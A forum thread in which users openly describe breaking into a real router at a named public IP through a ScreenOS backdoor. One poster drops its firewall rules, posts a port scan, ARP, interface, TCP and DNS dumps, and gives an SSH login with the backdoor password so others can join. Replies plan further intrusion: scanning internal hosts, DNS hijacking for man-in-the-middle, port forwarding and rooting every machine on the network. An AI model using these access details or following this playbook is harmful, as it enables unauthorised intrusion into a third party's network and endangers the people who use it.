User Controls

Ok guise lets commandeer this network for keks.

  1. #1
    Sophie Pedophile Tech Support
    You may recall my thread on ScreenOS router backdoors. http://niggasin.space/forum/technoph...list-by-sophie If you haven't read it already, you should it's an interesting thread. Anyway i SSH'd into a backdoored router to see if i could do anything interesting, i'm root so i can basically do anything i want. First i dropped all screens(firewall rules) then i was able to portscan the IP in question. Here's the results.


    Starting Nmap 6.47
    Nmap scan report for rrcs-24-213-214-22.nys.biz.rr.com (24.213.214.22)
    Host is up (0.023s latency).
    Not shown: 808 enhancemented ports, 189 closed ports

    PORT STATE SERVICE
    22/tcp open ssh
    8080/tcp open http-proxy
    8181/tcp open unknown

    Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds


    The http-proxy service redirects from 24.213.214.22:8080 to 24.213.214.22:8181 which is a login screen, https://24.213.214.22:8181/index.html probably for remote access to the router via HTTPS. Querying the administrative configuration seems to corroborate this.


    HTTP Port: 8080, HTTPS Port: 8181
    TELNET Port: 23, SSH Port: 22
    Manager IP enforced: False
    Manager IPs: 0

    Address Mask Vsys
    ---------------------------------------- ---------------------------------------- --------------------
    Mail Alert: Off, Mail Server:
    E-Mail Address:
    E-Mail Traffic Log: Off
    Configuration Format: DOS
    Device Reset: Enabled
    Hardware Reset: Enabled
    Admin privilege: read-only (Remote admin has read-only privileges)
    Max Failed Admin login attempts: 3
    Lock admin accounts on auth failure: On, locking time 3 minutes
    HTTP redirect: true


    Also note how admin privilege says we should have "read only" privilege, well that would be true if we logged in with a regular admin account but the nature of the backdoor is that you login as sys/root. There's also a number of devices connected to the router as the arp table shows:


    usage: 6/1024 miss: 0
    always-on-dest: disabled
    -----------------------------------------------------------------------------------------
    IP Mac VR/Interface State Age Retry PakQue Sess_cnt
    -----------------------------------------------------------------------------------------
    192.168.55.255 ffffffffffff trust-vr/bgroup0 STS 0 0 1
    192.168.55.200 0000aafb5ea6 trust-vr/bgroup0 VLD 693 0 0 0
    24.213.214.21 0000ca000003 trust-vr/eth0/0 VLD 666 0 0 9
    192.168.55.105 7427eaf334d5 trust-vr/bgroup0 VLD 1180 0 0 2
    192.168.55.114 08000f678d32 trust-vr/bgroup0 VLD 494 0 0 2
    192.168.55.115 08000f678f4e trust-vr/bgroup0 VLD 313 0 0 2


    Now i was wondering, since we own the router and firewall what would be the next logical step in securing the rest of the network? Feel free to SSH into the thing and come have a look.

    ssh -l administrator 24.213.214.22

    Password: <<< %s(un='%s') = %u

    Here's a list of basic commands.

    http://www.skullbox.net/screenos-cheat-sheet.php

    Here are some more obscure commands including those for displaying all commands available.

    http://www.cymru.com/gillsr/document...n-commands.htm
  2. #2
    LiquidIce Houston
    inb4 honeypot

    Nice job, SWIY.

    A word of caution though:

    SSH may also log your public key fingerprints fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.

    As far as what to do next:

    You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the arp table, routing table, dhcp entires. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the arp table with the dhcp table and then find out the mfg of connected devices from their mac addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kinda traffic is going in and out. This is all completely passive - you're not interacting with the network in any way so you shouldnt set off any IDS or anything.

    As far as active recon, I don't have any ideas right now.

  3. #3
    notreal Yung Blood
    "Now i was wondering, since we own the router and firewall what would be the next logical step in securing the rest of the network? "

    Get us some more info on the clients, see whats diddling around, what services, oses they like etc

    gj

    https://www.youtube.com/watch?v=cIzM9p3dUm8
  4. #4
    Sophie Pedophile Tech Support
    inb4 honeypot

    Nice job, SWIY.

    A word of caution though:

    SSH may also log your public key fingerprints fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.

    As far as what to do next:

    You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the arp table, routing table, dhcp entires. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the arp table with the dhcp table and then find out the mfg of connected devices from their mac addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kinda traffic is going in and out. This is all completely passive - you're not interacting with the network in any way so you shouldnt set off any IDS or anything.

    As far as active recon, I don't have any ideas right now.

    "get nat"

    Didn't give me anything. "get dhcp" told me DHCP server is enableb but:


    bgroup0: DHCP server is enabled
    Total 0 MACs are queued by DHCP relay.


    Truth be told i'm not much of a network engineer, furthermore, ScreenOS has other 'command' conventions that what i'm used to. Also:

    Get us some more info on the clients, see whats diddling around, what services, oses they like etc

    I would but first i'll be looking into some ScrenOS commands some more to actually get the thing to do what i want it to do. Any tips would be welcomed.
  5. #5
    LiquidIce Houston
    Hm, I'll try to look into it soon. There's gotta be some way to read the tables :/ I mean cisco IOS has all these tools to manually edit this info, so I cant believe juniper os doesnt have the same capabilities... but maybe it is. I've got like 1h of internet time a day, I'll try to get back to you.

    Did you make any progress?
  6. #6
    Sophie Pedophile Tech Support
    Did you make any progress?

    I had some IRL matter to take care of today, tonight when i have a moment i'll play around with it some more.
  7. #7
    SBTlauien African Astronaut
    Is there any valuable data within this network, or is it just a network to play with?
  8. #8
    Sophie Pedophile Tech Support
    "get tcp" showed me this


    tcp checksum error: 11, tcp http ping: 0
    tcp user auth: 0, tcp unknown port 0
    tcp no more socket: 0, tcp syn pak error: 7522
    tcp socket full drop count: 331
    tcp ooo segs: 0, tcp ooo segs drop count: 0
    max ooo segs: 32, default max ooo segs 32
    Total sock: 5/64, debug remote port: 65535
    1: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
    ::/8181, ::/0, window: 0/0/0
    2: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
    ::/23, ::/0, window: 0/0/0
    3: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
    ::/22, ::/0, window: 0/0/0
    47: inuse: 1, mode: 2, state: 4, ifnum: 0, idle: 0, timer 1(0/10)
    24.213.214.22/22, 95.141.29.38/2593, window: -172350114/-1651650253/16384
    50: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
    ::/8080, ::/0, window: 0/0/0


    "get interface" showed me this.



    A - Active, I - Inactive, U - Up, D - Down, R - Ready

    Interfaces in vsys Root:
    Name IP Address Zone MAC VLAN State VSD
    serial0/0 0.0.0.0/0 Null N/A - D -
    eth0/0 24.213.214.22/30 Untrust 3c8a.b0af.2d80 - U -
    eth0/1 0.0.0.0/0 Null 3c8a.b0af.2d85 - D -
    eth0/3 0.0.0.0/0 Null 3c8a.b0af.2d87 - D -
    eth0/4 0.0.0.0/0 Null 3c8a.b0af.2d88 - D -
    eth0/5 0.0.0.0/0 Null 3c8a.b0af.2d89 - D -
    eth0/6 0.0.0.0/0 Null 3c8a.b0af.2d8a - D -
    bgroup0 192.168.55.1/24 Trust 3c8a.b0af.2d8b - U -
    eth0/2 N/A N/A N/A - U -
    bgroup1 0.0.0.0/0 Null 3c8a.b0af.2d8c - D -
    bgroup2 0.0.0.0/0 Null 3c8a.b0af.2d8d - D -
    bgroup3 0.0.0.0/0 Null 3c8a.b0af.2d8e - D -
    tun.1 unnumbered Trust ethernet0/0 - U -
    vlan1 0.0.0.0/0 VLAN 3c8a.b0af.2d8f 1 D -
    null 0.0.0.0/0 Null N/A - U -



    Dropped some system info. But guys jesus christ the documentation on ScreenOS including all commands is literally 900 pages long



    PIN-ROCH-> get system
    Product Name: SSG5-Serial
    Serial Number: 0162112013000693, Control Number: 00000000
    Hardware Version: 0710(0)-(00), FPGA checksum: 00000000, VLAN1 IP (0.0.0.0)
    Flash Type: Samsung
    Software Version: 6.3.0r17.0, Type: Firewall+VPN
    Feature: AV-K
    BOOT Loader Version: 1.3.2
    Compiled by build_master at: Sun Apr 20 10:10:02 PDT 2014
    Base Mac: 3c8a.b0af.2d80
    File Name: screenos_image, Checksum: ca92f672
    , Total Memory: 256MB

    Date 01/28/2016 17:59:44, Daylight Saving Time enabled
    The Network Time Protocol is Disabled
    Up 1693 hours 48 minutes 40 seconds Since 19Nov2015:04:11:04
    Total Device Resets: 0

    System in NAT/route mode.

    Use interface IP, Config Port: 8080
    Manager IP enforced: False
    Manager IPs: 0

    Address Mask Vsys
    ---------------------------------------- ---------------------------------------- --------------------
    User Name: netscreen

    Interface serial0/0:
    description serial0/0
    number 21, if_info 1848, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d95
    bandwidth: physical 92kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/0:
    description ethernet0/0
    number 0, if_info 0, if_index 0, mode route
    link up, phy-link up/full-duplex, admin status up
    status change:105, last change:01/27/2016 17:12:00
    vsys Root, zone Untrust, vr trust-vr
    dhcp client disabled
    PPPoE disabled
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 24.213.214.22/30 mac 3c8a.b0af.2d80
    gateway 24.213.214.21
    *manage ip 24.213.214.22, mac 3c8a.b0af.2d80
    route-deny disable
    bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/1:
    description ethernet0/1
    number 5, if_info 440, if_index 0
    link down, phy-link down, admin status down
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d85
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/2:
    description ethernet0/2
    number 6, if_info 528, if_index 0
    link up, phy-link up/full-duplex
    status change:1, last change:11/19/2015 04:11:06
    member of bgroup0
    vsys Root, zone Null, vr untrust-vr
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d86
    Interface ethernet0/3:
    description ethernet0/3
    number 7, if_info 616, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d87
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/4:
    description ethernet0/4
    number 8, if_info 704, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d88
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/5:
    description ethernet0/5
    number 9, if_info 792, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d89
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/6:
    description ethernet0/6
    number 10, if_info 880, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d8a
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface bgroup0:
    description bgroup0
    number 11, if_info 968, if_index 0, mode nat
    link up, phy-link up/full-duplex, admin status up
    status change:1, last change:11/19/2015 04:11:06
    vsys Root, zone Trust, vr trust-vr
    dhcp client disabled
    PPPoE disabled
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 192.168.55.1/24 mac 3c8a.b0af.2d8b
    *manage ip 192.168.55.1, mac 3c8a.b0af.2d8b
    route-deny disable
    bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface bgroup1:
    description bgroup1
    number 12, if_info 1056, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d8c
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface bgroup2:
    description bgroup2
    number 13, if_info 1144, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d8d
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface bgroup3:
    description bgroup3
    number 14, if_info 1232, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d8e
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
  9. #9
    Sophie Pedophile Tech Support
    MAybe i'll just let Nexpose scan the router with the credentials i provided to maybe that would make me any the wiser.
  10. #10
    Sophie Pedophile Tech Support
    Is there any valuable data within this network, or is it just a network to play with?

    No clue, so far all i'll i've able to access is the router.
  11. #11
    Give me like 2 hours and I'll have every box on the network rooted
  12. #12
    Sophie Pedophile Tech Support
    Give me like 2 hours and I'll have every box on the network rooted

    Teach me the ways of the force, master.
  13. #13
    LiquidIce Houston
    Teach me the ways of the force, master.

    Sorry that I havent posted anything yet, I just got back from traveling and Im jet lagged back into 1999.
  14. #14
    Sophie Pedophile Tech Support
    Sorry that I havent posted anything yet, I just got back from traveling and Im jet lagged back into 1999.

    No need to apoligize, silly.
  15. #15
    LiquidIce Houston
    Interesting make-believe scenario.

    So there's not much going on in there it seems. No DHCP - maybe the hosts use static addressing? The arp'ed macs show that there's probably a few pc's and a printer on the network. You could try scanning those ip's for open ports.

    Another thing that comes to mind is taking a snapshot of the current interface counters now and in like 24h to get an idea of how much data is moved through the network. Looking at the docs, youd do this by


    get counter statistics interface ethernet0/0
    get counter statistics interface ethernet0/6


    I'm going by your latest info dump that specifies interfaces 0 and 6 as being up and all the others as being down.

    You could also do


    get dns host settings - Displays DNS servers and assigned interfaces
    get admin - Displays management information such as access ports and enhancemented IP addresses

    A DNS server/cache could be a trove of information or helpful in further steps in this game.
  16. #16
    Sophie Pedophile Tech Support
    Currently running a network audit with Nexpose with the credentials i provided, if nothing interesting comes up i'll run an asset discovery scan if that comes up with the local network i'll run a general audit on the devices on the network itself, obviously i'll post the results here. here's the info you requested.


    get dns host settings
    DNS Server:
    Primary : 24.92.226.11, Src Interface: ethernet0/0
    Secondary: 24.92.226.12, Src Interface: ethernet0/0
    Tertiary : 0.0.0.0, Src Interface: Null

    Refresh domain name IP Addresses:
    Never

    Normal UDP session: 0
  17. #17
    LiquidIce Houston
    Currently running a network audit with Nexpose with the credentials i provided, if nothing interesting comes up i'll run an asset discovery scan if that comes up with the local network i'll run a general audit on the devices on the network itself, obviously i'll post the results here. here's the info you requested.


    get dns host settings
    DNS Server:
    Primary : 24.92.226.11, Src Interface: ethernet0/0
    Secondary: 24.92.226.12, Src Interface: ethernet0/0
    Tertiary : 0.0.0.0, Src Interface: Null

    Refresh domain name IP Addresses:
    Never

    Normal UDP session: 0

    GJ dude. The dns stuff doesn't look interesting, it's just using some default TWC dns servers I think. It does offer some chance of a mitm if you set up your own dns server and changed those settings to point to your dns server.
  18. #18
    Sophie Pedophile Tech Support
    GJ dude. The dns stuff doesn't look interesting, it's just using some default TWC dns servers I think. It does offer some chance of a mitm if you set up your own dns server and changed those settings to point to your dns server.

    I'm trying to forward some ports, "set VIP multi-port" is the first command in a series you need to perform, but it told me the router had to be reset in order for the changes to take effect i thought about it but if there are people actively using the network and i reset the router remotely they might start to ask questions lel. Also, sadly, i don't have my own DNS server. Nexpose only got as far as the router it did find some vulnerabilities related to the web interface of the thing but nothing too interesting. Mostly certificate stuff.

    Now i usually do web app so i have no idea how to get past the router into the network itself without forwarding ports or if that's even the best way for that matter. Here's the documentation i could find on port forwarding, http://kb.juniper.net/InfoCenter/ind...tent&id=KB4740
Jump to Top